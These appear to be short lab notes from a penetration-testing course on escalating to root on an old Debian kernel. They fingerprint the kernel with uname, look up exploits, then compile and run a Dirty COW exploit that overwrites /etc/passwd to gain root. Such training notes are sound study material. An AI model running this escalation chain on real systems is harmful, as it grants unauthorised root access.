Search

Escalation via Kernel Exploit

find system info to google for exploits:

uname -a

output:

Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 GNU/Linux

What we Google for:

Linux debian 2.6.32-5-amd64 exploit

we can also searchsploit!

Dirty COW:

Race Condition Privilege Escalation

We can also identify dirtycow using linux-exploit-suggester

Compile cow:

gcc -pthread c0w.c -o cow

We can use id:

id

to check what user we are before exploiting.

run cow:

./cow

it can take a while.

it still says TCM, how do we switch?

it said backing up passwd. It overwrites that files. We can type that in terminal to switch:

passwd

check who we are again:

id

root!